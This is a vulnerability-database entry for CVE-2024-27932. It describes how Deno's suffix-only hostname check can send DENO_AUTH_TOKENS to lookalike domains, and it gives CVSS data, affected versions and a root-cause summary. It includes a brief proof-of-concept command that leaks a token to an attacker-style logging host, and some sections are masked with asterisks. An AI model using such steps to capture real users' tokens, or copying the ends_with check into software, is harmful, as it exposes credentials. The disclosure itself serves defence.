4.6

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-27932

GHSA ID

GHSA-5frw-4rwq-xhcr

EPSS Score

0.6268%

CWE

CWE-20

Published

3/6/2024

Updated

3/21/2024

KEV Status

Technology

Rust

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-27932

CVE-2024-27932: Deno's improper suffix match testing for DENO_AUTH_TOKENS

Summary

Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com.

Details

auth_tokens.rs uses a simple ends_with check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.

PoC

Set up a server that logs requests. RequestBin will do. For example, denovulnpoc.example.com.
Run DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
Observe that the token intended only for the truncated domain is sent to the full domain

Impact

What kind of vulnerability is it? Who is impacted? Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected.

(GitHub Advisory)

4.6

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-27932

GHSA ID

GHSA-5frw-4rwq-xhcr

EPSS Score

0.6268%

CWE

CWE-20

Published

3/6/2024

Updated

3/21/2024

KEV Status

Technology

Rust

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
deno	rust	>= 1.8.0, < 1.40.4	1.40.4

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stemmed from the hostname matching logic in AuthTokens::get, which used hostname.to_lowercase().ends_with(&t.host). This allowed suffix matches without proper domain boundary validation. The commit diff shows this logic was replaced with AuthDomain::matches that adds proper domain validation, confirming the original function's vulnerability.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry **no improp*rly ****ks t**t *n import sp**i*i*r's *ostn*m* is *qu*l to or * **il* o* * tok*n's *ostn*m*, w*i** **n **us* tok*ns to ** s*nt to s*rv*rs t**y s*oul*n't ** s*nt to. *n *ut* tok*n int*n*** *or `*x*mpl*.*om` m*y ** s*nt to `not

Reasoning

T** vuln*r**ility st*mm** *rom t** *ostn*m* m*t**in* lo*i* in *ut*Tok*ns::**t, w*i** us** *ostn*m*.to_low*r**s*().*n*s_wit*(&t.*ost). T*is *llow** su**ix m*t***s wit*out prop*r *om*in *oun**ry v*li**tion. T** *ommit *i** s*ows t*is lo*i* w*s r*pl****

4.6

Basic Information

Concerned about an active attack path?

CVE-2024-27932: Deno's improper suffix match testing for DENO_AUTH_TOKENS

Summary

Details

PoC

Impact

4.6

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI